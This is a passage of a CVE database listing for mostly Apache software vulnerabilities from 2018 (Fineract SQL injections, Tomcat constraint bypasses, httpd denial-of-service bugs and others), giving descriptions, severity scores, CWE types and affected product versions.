Vendor Product Version
oracle database 11.2.0.4
oracle primavera_p6_enterprise_project_portfolio_management *
oracle timesten_in-memory_database *
oracle database 19c
oracle database 12.2.0.1
oracle database 18c
redhat jboss_middleware_text-only_advisories 1.0
apache kafka *
oracle database 12.1.0.2
apache kafka 1.0.0
CVE-2018-1289 MEDIUM

In Apache Fineract versions 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating, the system exposes different REST end points to query domain specific entities with a Query Parameter 'orderBy' and 'sortOrder' which are appended directly with SQL statements. A hacker/user can inject/draft the 'orderBy' and 'sortOrder' query parameter in such a way to read/update the data for which he doesn't have authorization.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract 0.4.0
apache fineract 1.0.0
apache fineract 0.6.0
apache fineract 0.5.0
CVE-2018-1290 HIGH

In Apache Fineract versions 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating, using a single quotation escape with two continuous SQL parameters can cause a SQL injection. This could be done in methods like retrieveAuditEntries of the AuditsApiResource class and retrieveCommands of the MakercheckersApiResource class.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract 0.4.0
apache fineract 1.0.0
apache fineract 0.6.0
apache fineract 0.5.0
CVE-2018-1291 MEDIUM

Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating exposes different REST end points to query domain specific entities with a Query Parameter 'orderBy' which are appended directly with SQL statements. A hacker/user can inject/draft the 'orderBy' query parameter by way of the "order" param in such a way to read/update the data for which he doesn't have authorization.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract 0.4.0
apache fineract 1.0.0
apache fineract 0.6.0
apache fineract 0.5.0
CVE-2018-1292 MEDIUM

Within the 'getReportType' method in Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating, a hacker could inject SQL to read/update data for which he doesn't have authorization for by way of the 'reportName' parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract 0.4.0
apache fineract 1.0.0
apache fineract 0.6.0
apache fineract 0.5.0
CVE-2018-1294 MEDIUM

If a user of Apache Commons Email (typically an application programmer) passes unvalidated input as the so-called "Bounce Address", and that input contains line-breaks, then the email details (recipients, contents, etc.) might be manipulated. Mitigation: Users should upgrade to Commons-Email 1.5. You can mitigate this vulnerability for older versions of Commons Email by stripping line-breaks from data that will be passed to Email.setBounceAddress(String).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache commons_email *
CVE-2018-1295 HIGH

In Apache Ignite 2.3 or earlier, the serialization mechanism does not have a list of classes allowed for serialization/deserialization, which makes it possible to run arbitrary code when vulnerable third-party classes are present in the Ignite classpath. The vulnerability can be exploited if one sends a specially prepared form of a serialized object to one of the deserialization endpoints of some Ignite components - discovery SPI, Ignite persistence, Memcached endpoint, socket streamer.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ignite *
CVE-2018-1296 MEDIUM

In Apache Hadoop 3.0.0-alpha1 to 3.0.0, 2.9.0, 2.8.0 to 2.8.3, and 2.5.0 to 2.7.5, HDFS exposes extended attribute key/value pairs during listXAttrs, verifying only path-level search access to the directory rather than path-level read permission to the referent.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hadoop 2.8.1
apache hadoop 2.8.2
apache hadoop 2.8.3
apache hadoop 2.8.0
apache hadoop *
apache hadoop 3.0.0
apache hadoop 2.9.0
CVE-2018-1297 HIGH

When using Distributed Test only (RMI based), Apache JMeter 2.x and 3.x uses an unsecured RMI connection. This could allow an attacker to get access to JMeterEngine and send unauthorized code.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-319,

Products Affected

Vendor Product Version
apache jmeter 2.4
apache jmeter 2.5
apache jmeter 2.11
apache jmeter 2.3.3
apache jmeter 2.5.1
apache jmeter 3.2
apache jmeter 2.10
apache jmeter 2.3.2
apache jmeter 2.1
apache jmeter 2.13
apache jmeter 2.7
apache jmeter 2.6
apache jmeter 3.0
apache jmeter 3.3
apache jmeter 2.3
apache jmeter 2.2
apache jmeter 2.9
apache jmeter 3.1
apache jmeter 2.12
apache jmeter 2.3.1
apache jmeter 2.8
apache jmeter 2.3.4
CVE-2018-1298 MEDIUM

A Denial of Service vulnerability was found in Apache Qpid Broker-J 7.0.0 in functionality for authentication of connections for AMQP protocols 0-8, 0-9, 0-91 and 0-10 when the PLAIN or XOAUTH2 SASL mechanism is used. The vulnerability allows an unauthenticated attacker to crash the broker instance. AMQP 1.0 and HTTP connections are not affected. Authentication of incoming AMQP connections in Apache Qpid Broker-J is performed by special entities called "Authentication Providers". Each Authentication Provider can support several SASL mechanisms, which are offered to the connecting clients as part of the SASL negotiation process. The client chooses the most appropriate SASL mechanism for authentication. Authentication Providers of the following types support the PLAIN SASL mechanism: Plain, PlainPasswordFile, SimpleLDAP, Base64MD5PasswordFile, MD5, SCRAM-SHA-256, SCRAM-SHA-1. The XOAUTH2 SASL mechanism is supported by Authentication Providers of type OAuth2. If an AMQP port is configured with any of these Authentication Providers, the Broker may be vulnerable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache qpid_broker-j 7.0.0
CVE-2018-1299 MEDIUM

In Apache Allura before 1.8.0, unauthenticated attackers may retrieve arbitrary files through the Allura web application. Some webservers used with Allura, such as Nginx, Apache/mod_wsgi or paster may prevent the attack from succeeding. Others, such as gunicorn do not prevent it and leave Allura vulnerable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache allura *
CVE-2018-1301 MEDIUM

A specially crafted request could have crashed the Apache HTTP Server prior to version 2.4.30, due to an out of bound access after a size limit is reached by reading the HTTP header. This vulnerability is considered very hard if not impossible to trigger in non-debug mode (both log and build level), so it is classified as low risk for common server usage.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.04
netapp storage_automation_store -
debian debian_linux 9.0
netapp santricity_cloud_connector -
debian debian_linux 7.0
netapp clustered_data_ontap -
debian debian_linux 8.0
canonical ubuntu_linux 17.10
redhat enterprise_linux 6.0
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
canonical ubuntu_linux 12.04
canonical ubuntu_linux 16.04
redhat enterprise_linux 7.4
canonical ubuntu_linux 14.04
redhat enterprise_linux 7.6
netapp storagegrid -
CVE-2018-1302 MEDIUM

When an HTTP/2 stream was destroyed after being handled, the Apache HTTP Server prior to version 2.4.30 could have written a NULL pointer potentially to an already freed memory. The memory pools maintained by the server make this vulnerability hard to trigger in usual configurations, the reporter and the team could not reproduce it outside debug builds, so it is classified as low risk.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.04
netapp storage_automation_store -
netapp santricity_cloud_connector -
netapp clustered_data_ontap -
netapp storagegrid -
CVE-2018-1303 MEDIUM

A specially crafted HTTP request header could have crashed the Apache HTTP Server prior to version 2.4.30 due to an out of bound read while preparing data to be cached in shared memory. It could be used as a Denial of Service attack against users of mod_cache_socache. The vulnerability is considered low risk since mod_cache_socache is not widely used; mod_cache_disk is not affected by this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
netapp storage_automation_store -
debian debian_linux 9.0
netapp santricity_cloud_connector -
canonical ubuntu_linux 14.04
netapp clustered_data_ontap -
debian debian_linux 8.0
canonical ubuntu_linux 17.10
netapp storagegrid -
CVE-2018-1304 MEDIUM

The URL pattern of "" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle secure_global_desktop 5.3
canonical ubuntu_linux 18.04
oracle micros_relate_crm_software 11.4
apache tomcat 8.0.0
oracle secure_global_desktop 5.4
debian debian_linux 9.0
oracle hospitality_guest_access 4.2.1
redhat jboss_enterprise_application_platform 6
debian debian_linux 7.0
redhat jboss_enterprise_application_platform 6.4
debian debian_linux 8.0
canonical ubuntu_linux 17.10
apache tomcat *
canonical ubuntu_linux 16.04
oracle fusion_middleware 12.2.1.3.0
canonical ubuntu_linux 14.04
apache tomcat 9.0.0
oracle hospitality_guest_access 4.2.0
redhat jboss_enterprise_web_server 3.0.0
redhat jboss_middleware 1
CVE-2018-1305 MEDIUM

Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
apache tomcat 9.0.4
oracle micros_relate_crm_software 11.4
apache tomcat 8.0.0
debian debian_linux 9.0
debian debian_linux 7.0
apache tomcat 9.0.1
debian debian_linux 8.0
canonical ubuntu_linux 17.10
apache tomcat 9.0.3
apache tomcat 9.0.2
apache tomcat *
canonical ubuntu_linux 16.04
oracle fusion_middleware 12.2.1.3.0
oracle managed_file_transfer 12.2.1.3.0
oracle managed_file_transfer 12.1.3.0.0
canonical ubuntu_linux 14.04
apache tomcat 9.0.0
CVE-2018-1306 MEDIUM

The PortletV3AnnotatedDemo Multipart Portlet war file code provided in Apache Pluto version 3.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to restrict path information provided during a file upload. An attacker could exploit this vulnerability to obtain configuration data and other sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache pluto 3.0.0
CVE-2018-1307 MEDIUM

In Apache jUDDI 3.2 through 3.3.4, if using the WADL2Java or WSDL2Java classes, which parse a local or remote XML document and then mediate the data structures into UDDI data structures, there is little protection present against entity expansion and DTD type attacks. Mitigation is to use 3.3.5.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache juddi *
CVE-2018-1308 MEDIUM

This vulnerability in Apache Solr 1.2 to 6.6.2 and 7.0.0 to 7.2.1 relates to an XML external entity expansion (XXE) in the `&dataConfig=<inlinexml>` parameter of Solr's DataImportHandler. It can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
debian debian_linux 9.0
debian debian_linux 7.0
apache solr *
debian debian_linux 8.0
CVE-2018-1309 HIGH

Apache NiFi External XML Entity issue in SplitXML processor. Malicious XML content could cause information disclosure or remote code execution. The fix to disable external general entity parsing and disallow doctype declarations was applied on the Apache NiFi 1.6.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-1310 MEDIUM

Apache NiFi JMS Deserialization issue because of ActiveMQ client vulnerability. Malicious JMS content could cause denial of service. See ActiveMQ CVE-2015-5254 announcement for more information. The fix to upgrade the activemq-client library to 5.15.3 was applied on the Apache NiFi 1.6.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-1311 MEDIUM

The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been addressed in the maintained version of the library and has no current mitigation other than to disable DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
redhat enterprise_linux_eus 7.7
debian debian_linux 9.0
debian debian_linux 10.0
fedoraproject fedora 39
apache xerces-c++ *
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_server_aus 7.7
fedoraproject fedora 38
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server 6.0
redhat enterprise_linux_workstation 6.0
oracle goldengate *
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2018-1312 MEDIUM

In Apache httpd 2.2.0 to 2.4.29, when generating an HTTP Digest authentication challenge, the nonce sent to prevent replay attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common Digest authentication configuration, HTTP requests could be replayed across servers by an attacker without detection.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache http_server 2.4.7
canonical ubuntu_linux 18.04
redhat enterprise_linux_server_tus 7.6
apache http_server 2.4.28
redhat jboss_core_services 1.0
apache http_server 2.4.2
redhat enterprise_linux_eus 7.6
netapp clustered_data_ontap -
apache http_server 2.4.18
apache http_server 2.4.3
apache http_server 2.4.26
apache http_server 2.4.10
canonical ubuntu_linux 12.04
netapp cloud_backup -
apache http_server 2.4.1
apache http_server 2.4.17
canonical ubuntu_linux 14.04
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
netapp storagegrid -
apache http_server 2.4.25
debian debian_linux 9.0
debian debian_linux 7.0
apache http_server 2.4.23
apache http_server 2.4.6
apache http_server 2.4.20
apache http_server 2.4.12
debian debian_linux 8.0
canonical ubuntu_linux 17.10
apache http_server 2.4.4
apache http_server 2.4.16
canonical ubuntu_linux 16.04
apache http_server 2.4.29
apache http_server 2.4.9
apache http_server 2.4.27
redhat enterprise_linux_server 7.0
CVE-2018-1313 LOW

In Apache Derby 10.3.1.4 to 10.14.1.0, a specially-crafted network packet can be used to request the Derby Network Server to boot a database whose location and contents are under the user's control. If the Derby Network Server is not running with a Java Security Manager policy file, the attack is successful. If the server is using a policy file, the policy file must permit the database location to be read for the attack to work. The default Derby Network Server policy file distributed with the affected releases includes a permissive policy as the default Network Server policy, which allows the attack to work.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N 1.6 3.6

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache derby *
oracle weblogic_server 12.2.1.3
CVE-2018-1314 MEDIUM

In Apache Hive 2.3.3, 3.1.0 and earlier, Hive "EXPLAIN" operation does not check for necessary authorization of involved entities in a query. An unauthorized user can do "EXPLAIN" on arbitrary table or view and expose table metadata and statistics.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache hive *
CVE-2018-1315 MEDIUM

In Apache Hive 2.1.0 to 2.3.2, when 'COPY FROM FTP' statement is run using HPL/SQL extension to Hive, a compromised/malicious FTP server can cause the file to be written to an arbitrary location on the cluster where the command is run from. This is because FTP client code in HPL/SQL does not verify the destination location of the downloaded file. This does not affect hive cli user and hiveserver2 user as hplsql is a separate command line script and needs to be invoked differently.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache hive *
CVE-2018-1316 MEDIUM

The ODE process deployment web service was susceptible to deployment messages with forged names. Using a path for the name allowed directory traversal, resulting in the potential writing of files under unwanted locations, the overwriting of existing files or their deletion. This issue was addressed in Apache ODE 1.3.3, which was released in 2009; however, the incorrect name CVE-2008-2370 was used on the advisory by mistake.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache ode 1.1.1
apache ode 1.0
apache ode 1.1
apache ode *
CVE-2018-1317 MEDIUM

In Apache Zeppelin prior to 0.8.0 the cron scheduler was enabled by default and could allow users to run paragraphs as other users without authentication.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2018-1318 MEDIUM

Adding method ACLs in remap.config can cause a segfault when the user makes a carefully crafted request. This affects versions Apache Traffic Server (ATS) 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue users running 6.x should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
CVE-2018-1319 MEDIUM

In Apache Allura prior to 1.8.1, attackers may craft URLs that cause HTTP response splitting. If a victim goes to a maliciously crafted URL, unwanted results may occur including XSS or service denial for the victim's browsing session.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache allura *
CVE-2018-1320 MEDIUM

Apache Thrift Java client library versions 0.5.0 through 0.11.0 can bypass SASL negotiation isComplete validation in the org.apache.thrift.transport.TSaslTransport class. An assert used to determine if the SASL handshake had successfully completed could be disabled in production settings making the validation incomplete.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
oracle global_lifecycle_management_opatch *
apache thrift *
oracle nosql_database *
debian debian_linux 8.0
f5 traffix_signaling_delivery_controller *
CVE-2018-1321 MEDIUM

An administrator with report and template entitlements in Apache Syncope 1.2.x before 1.2.11, 2.0.x before 2.0.8, and unsupported releases 1.0.x and 1.1.x which may be also affected, can use XSL Transformations (XSLT) to perform malicious operations, including but not limited to file read, file write, and code execution.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache syncope 1.0.7
apache syncope 1.1.8
apache syncope 1.1.2
apache syncope 1.2.0
apache syncope 1.1.3
apache syncope 1.0.0
apache syncope 1.1.4
apache syncope 1.0.6
apache syncope 1.1.6
apache syncope 1.1.5
apache syncope 1.0.8
apache syncope 1.0.9
apache syncope 1.1.7
apache syncope *
apache syncope 1.1.1
apache syncope 1.0.5
apache syncope 1.1.0
apache syncope 1.0.4
CVE-2018-1322 MEDIUM

An administrator with user search entitlements in Apache Syncope 1.2.x before 1.2.11, 2.0.x before 2.0.8, and unsupported releases 1.0.x and 1.1.x which may be also affected, can recover sensitive security values using the fiql and orderby parameters.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache syncope 1.0.7
apache syncope 1.1.8
apache syncope 1.1.2
apache syncope 1.1.3
apache syncope 1.0.0
apache syncope 1.1.4
apache syncope 1.0.6
apache syncope 1.1.6
apache syncope 1.1.5
apache syncope 1.0.3
apache syncope 1.0.8
apache syncope 1.0.9
apache syncope 1.1.7
apache syncope *
apache syncope 1.1.1
apache syncope 1.0.5
apache syncope 1.1.0
apache syncope 1.0.4
CVE-2018-1323 MEDIUM

The IIS/ISAPI specific code in the Apache Tomcat JK ISAPI Connector 1.2.0 to 1.2.42 that normalised the requested path before matching it to the URI-worker map did not handle some edge cases correctly. If only a subset of the URLs supported by Tomcat were exposed via IIS, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing Tomcat via the reverse proxy.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,CWE-200,

Products Affected

Vendor Product Version
apache tomcat_jk_connector *
CVE-2018-1324 MEDIUM

A specially crafted ZIP archive can be used to cause an infinite loop inside of Apache Commons Compress' extra field parser used by the ZipFile and ZipArchiveInputStream classes in versions 1.11 to 1.15. This can be used to mount a denial of service attack against services that use Compress' zip package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle mysql_cluster *
oracle weblogic_server 14.1.1.0.0
apache commons_compress *
CVE-2018-1327 MEDIUM

The Apache Struts REST Plugin uses the XStream library, which is vulnerable and allows a DoS attack via a malicious request with a specially crafted XML payload. Upgrade to Apache Struts version 2.5.16 and switch to an optional Jackson XML handler as described here http://struts.apache.org/plugins/rest/#custom-contenttypehandlers. Another option is to implement a custom XML handler based on the Jackson XML handler from Apache Struts 2.5.16.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts *
CVE-2018-1328 MEDIUM

Apache Zeppelin prior to 0.8.0 had a stored XSS issue via Note permissions. Issue reported by "Josna Joseph".

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2018-1330 MEDIUM

When parsing a malformed JSON payload, libprocess in Apache Mesos versions 1.4.0 to 1.5.0 might crash due to an uncaught exception. Parsing chunked HTTP requests with trailers can also lead to a libprocess crash because of a mistakenly planted assertion. A malicious actor can therefore cause a denial of service of Mesos masters, rendering the Mesos-controlled cluster inoperable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache mesos 1.6.0
apache mesos *
apache mesos 1.4.0
CVE-2018-1331 MEDIUM

In Apache Storm 0.10.0 through 0.10.2, 1.0.0 through 1.0.6, 1.1.0 through 1.1.2, and 1.2.0 through 1.2.1, an attacker with access to a secure storm cluster in some cases could execute arbitrary code as a different user.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache storm *
CVE-2018-1332 MEDIUM

Apache Storm version 1.0.6 and earlier, 1.2.1 and earlier, and version 1.1.2 and earlier expose a vulnerability that could allow a user to impersonate another user when communicating with some Storm Daemons.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache storm *
CVE-2018-1333 MEDIUM

By specially crafting HTTP/2 requests, workers would be allocated 60 seconds longer than necessary, leading to worker exhaustion and a denial of service. Fixed in Apache HTTP Server 2.4.34 (Affected 2.4.18-2.4.30, 2.4.33).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
netapp cloud_backup -
canonical ubuntu_linux 18.04
netapp storage_automation_store -
apache http_server 2.4.33
redhat jboss_core_services 1.0
CVE-2018-1334 LOW

In Apache Spark 1.0.0 to 2.1.2, 2.2.0 to 2.2.1, and 2.3.0, when using PySpark or SparkR, it's possible for a different local user to connect to the Spark application and impersonate the user running the Spark application.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache spark 2.3.0
apache spark *
CVE-2018-1335 HIGH

From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-1336 MEDIUM

An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder, causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
redhat jboss_enterprise_application_platform 6.0.0
apache tomcat 8.0.0
debian debian_linux 9.0
redhat jboss_enterprise_web_server 5.0.0
debian debian_linux 8.0
apache tomcat *
canonical ubuntu_linux 16.04
canonical ubuntu_linux 14.04
apache tomcat 9.0.0
redhat jboss_enterprise_application_platform 6.4.0
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2018-1337 MEDIUM

In Apache Directory LDAP API before 1.0.2, a bug in the way the SSL Filter was set up made it possible for another thread to use the connection before the TLS layer had been established, if the connection had already been used and put back in a pool of connections, leading to leaking any information contained in this request (including the credentials when sending a BIND request).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache directory_ldap_api *
CVE-2018-1338 MEDIUM

A carefully crafted (or fuzzed) file can trigger an infinite loop in Apache Tika's BPGParser in versions of Apache Tika before 1.18.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-1339 MEDIUM

A carefully crafted (or fuzzed) file can trigger an infinite loop in Apache Tika's ChmParser in versions of Apache Tika before 1.18.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-1340 MEDIUM

Prior to 1.0.0, Apache Guacamole used a cookie for client-side storage of the user's session token. This cookie lacked the "secure" flag, which could allow an attacker eavesdropping on the network to intercept the user's session token if unencrypted HTTP requests are made to the same domain.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-311,

Products Affected

Vendor Product Version
apache guacamole *
CVE-2018-14889 MEDIUM

CouchDB in Vectra Networks Cognito Brain and Sensor before 4.3 contains a local code execution vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache couchdb -
CVE-2018-17184 LOW

A malicious user with enough administration entitlements can inject HTML-like elements containing JavaScript statements into Connector names, Report names, AnyTypeClass keys and Policy descriptions. When another user with enough administration entitlements edits one of the Entities above via the Admin Console, the injected JavaScript code is executed.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache syncope *
CVE-2018-17186 MEDIUM

An administrator with workflow definition entitlements can use DTD to perform malicious operations, including but not limited to file read, file write, and code execution.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache syncope *
CVE-2018-17187 MEDIUM

The Apache Qpid Proton-J transport includes an optional wrapper layer to perform TLS, enabled by use of the 'transport.ssl(...)' methods. Unless a verification mode was explicitly configured, client and server modes previously defaulted as documented to not verifying a peer certificate, with options to configure this explicitly or select a certificate verification mode with or without hostname verification being performed. The latter hostname verifying mode was not implemented in Apache Qpid Proton-J versions 0.3 to 0.29.0, with attempts to use it resulting in an exception. This left only the option to verify the certificate is trusted, leaving such a client vulnerable to Man In The Middle (MITM) attack. Uses of the Proton-J protocol engine which do not utilise the optional transport TLS wrapper are not impacted, e.g. usage within Qpid JMS. Uses of Proton-J utilising the optional transport TLS wrapper layer that wish to enable hostname verification must be upgraded to version 0.30.0 or later and utilise the VerifyMode#VERIFY_PEER_NAME configuration, which is now the default for client mode usage unless configured otherwise.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache qpid_proton-j *
CVE-2018-17188 MEDIUM

Prior to CouchDB version 2.3.0, CouchDB allowed for runtime-configuration of key components of the database. In some cases, this led to vulnerabilities where CouchDB admin users could access the underlying operating system as the CouchDB user. Together with other vulnerabilities, it allowed full system entry for unauthenticated users. Rather than waiting for new vulnerabilities to be discovered and fixing them as they come up, the CouchDB development team decided to make changes to avoid this entire class of vulnerabilities.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2018-17189 MEDIUM

In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow-loris fashion to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 (mod_http2) connections.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.10
canonical ubuntu_linux 18.04
netapp storage_automation_store -
netapp santricity_cloud_connector -
apache http_server 2.4.30
oracle instantis_enterprisetrack 17.1
oracle hospitality_guest_access 4.2.1
apache http_server 2.4.28
redhat jboss_core_services 1.0
fedoraproject fedora 28
oracle enterprise_manager_ops_center 12.3.3
apache http_server 2.4.18
apache http_server 2.4.26
apache http_server 2.4.17
apache http_server 2.4.33
canonical ubuntu_linux 14.04
oracle retail_xstore_point_of_service 7.1
apache http_server 2.4.34
oracle hospitality_guest_access 4.2.0
oracle instantis_enterprisetrack 17.3
fedoraproject fedora 29
oracle retail_xstore_point_of_service 7.0
oracle sun_zfs_storage_appliance_kit 8.8.6
apache http_server 2.4.25
debian debian_linux 9.0
apache http_server 2.4.23
apache http_server 2.4.20
